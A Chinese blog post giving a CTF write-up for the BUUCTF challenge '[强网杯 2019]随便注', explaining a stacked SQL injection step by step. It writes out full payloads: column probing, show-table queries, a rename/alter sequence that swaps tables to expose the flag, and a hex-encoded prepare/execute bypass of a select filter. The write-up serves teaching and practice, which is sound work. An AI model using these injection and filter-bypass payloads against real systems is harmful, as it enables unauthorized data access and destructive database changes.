[强网杯 2019]随便注

最新推荐文章于 2024-08-23 09:34:27 发布
最新推荐文章于 2024-08-23 09:34:27 发布
阅读量2.7k 收藏 13
点赞数 8
分类专栏: CTF题解 文章标签: web安全 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56691564/article/details/128123951
版权

[强网杯 2019]随便注

进入页面:

image-20221129164703490

又是一道sql注入,题目直接输了1,查询一下试一试:

image-20221129164556760

在1后面加个引号,报错闭合不正确:

image-20221129165441940

因此能够注入且是单引号闭合,开始注入:

http://633755ff-5743-45c1-9ffe-93631ba8beaf.node4.buuoj.cn:81/?inject=1' order by 3 --+

报错,改成order by 2就是正确的,因此数据库只有两列,接下来继续找显示位:

http://633755ff-5743-45c1-9ffe-93631ba8beaf.node4.buuoj.cn:81/?inject=1' union select 1,2 --+

有返回如下:

image-20221129165849761

大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是注释都不行,因此这个题使用堆叠注入。

什么是堆叠注入?

就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。

一般select等被禁用时,可以考虑堆叠注入,构造payload如下:

http://2c83c7d5-34b2-4c9f-92a2-908b81909d86.node4.buuoj.cn:81/?inject=1' ;show database --+

这里补充一下show函数的用法:

(6条消息) MySQL show()函数详述_qq_36801966的博客-CSDN博客_mysql show函数

show databases//列出服务器可访问的数据库
show tables//显示该数据库内相关表的名称
show columns from tablename;//显示表tablename的字段、字段类型、键值信息、是否可以用null、默认值及其他信息。
//这里大概就用到这些。

发现页面有回显:

image-20221129200636048

看看表:

http://2c83c7d5-34b2-4c9f-92a2-908b81909d86.node4.buuoj.cn:81/?inject=1' ;show tables --+

image-20221129200858872

这个,应该就有两个表的意思吧,先看看words,构造payload如下:

http://2c83c7d5-34b2-4c9f-92a2-908b81909d86.node4.buuoj.cn:81/?inject= 1'; show columns from `words`--+

注意:这里使用的是反引号而不是双引号,这两个在Linux下不区分,但在Windows下区分。
单引号或者双引号主要用于字符串的引用符号。
数据库、表、索引、列和别名的引用符是反勾号。
有MySQL保留字作为字段的,必须加上反引号来区分,如果是数值,不能使用引号。

image-20221129201128017

再看看另一个表:(本来在这里我没有去看另一个表的,这件事告诉我们一定不要只看表面就偷懒。

image-20221129201439142

这里有flag。

这里又只能抄大佬作业了:

由show的作用可知,words表内就两个字段,一个叫id,一个叫data。

并且可以得知,该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。因此我们对表进行改名:

用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。

构造payload如下:

http://4a74d507-bd81-4639-8579-82aebaf359cb.node4.buuoj.cn:81/?inject=1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);

回显如下:
image-20221129210023348

得到flag:flag{ab4b598b-f443-44a2-a14e-d27d2b69acef}

这里补充一下alter:

//alter可以修改已知表的列
alter table "table_name" add "column_name" type;//添加一个列
alter table "table_name" drop "column_name" type;//删除一个列
alter table "table_name" alter column "column_name" type;//改变列的数据类型
alter table "table_name" change "column1" "column2" type;//改列名
alter table "table_name" rename "column1" to "column2";//改列名

解法二:

由于select被过滤了,因此将select * from ` 1919810931114514``进行十六进制编码,再构造payload。

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

知识点:

  1. prepare…from…是预处理语句,会进行编码转换。
  2. execute用来执行由SQLPrepare创建的SQL语句。
  3. SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。

解法三:

一点没看懂。

[(6条消息) BUUCTF强网杯 2019]随便注 的三种解法_天问_Herbert555的博客-CSDN博客_buuctf 随便注

用到的知识点:

HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。

好的现在大概理解了一点点,开摆。

今天小白努力学习了吗
关注
专栏目录
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 616
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 403
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2686
以buuctf的强网杯2019为例的堆叠
第七届强网杯-PWN-【WTOA】
最新发布
llovewuzhengzi的博客
08-23 962
由于指令集和运行时环境本身与web场景并不绑定,因此随着后来的发展,WebAssembly指令集出现了可以脱离浏览器的独立运行时环境,WebAssembly的用途也变得更加广泛。相比于浏览器的运行时,wasmtime是一个独立运行时环境,它可以脱离Web环境来执行wasm代码。根据字符串定位时发现没有引用的,后来发现是通过偏移的,发现第 3 个参数原来是 .rodata.wasm 段内的偏移值。起改为flag的偏移,然后show可以泄露处flag,当然长度不够,再把size改大就行。
强网杯2019随便
qq_45927819的博客
09-10 1105
题目: 由题目信息可得出,采用SQL入; 首先判断闭合符号,输入1’ 发现报错了,用**#**截断 那么存在入漏洞,接下来查询字段数,**1’ order by 3#**发现报错了 **1’ order by 2#**则显示正常,那么字段数为两个; 联合查询:1’ union select 1,2# select,update,…都被过滤掉了; 堆叠入:又叫多语句入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句。 我们继续查询数据库:1’;show databases;# 接下来
[强网杯 2019]随便 1
tomatoff的博客
03-14 2851
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
【BUUCTF】web强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
[强网杯 2019]随便.docx
12-18
强网杯 2019SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
mysql数据库show的常用命令说明
coujiongyong0208的博客
10-24 195
show columns from table_name from database_name; 或show columns from database_name.table_name; -- 显示表中列名称。 ...
(转载)强网杯2019 随便
yingyugo的博客
11-24 241
虽然题目做得不多但是工具这题考察的知识面很广 尝试入: 1,测试 1’ or 1=1 # ,初步判定存在SQL入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union入,回显了过滤的关键字。 1’ union select 1,2# 然后就是今天学会的新姿势“堆叠入”了。 原理很简单,就是通过 ; 号入多条SQL语句。 先通过show databases爆出数据库。 0'; show databases; # 然后
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值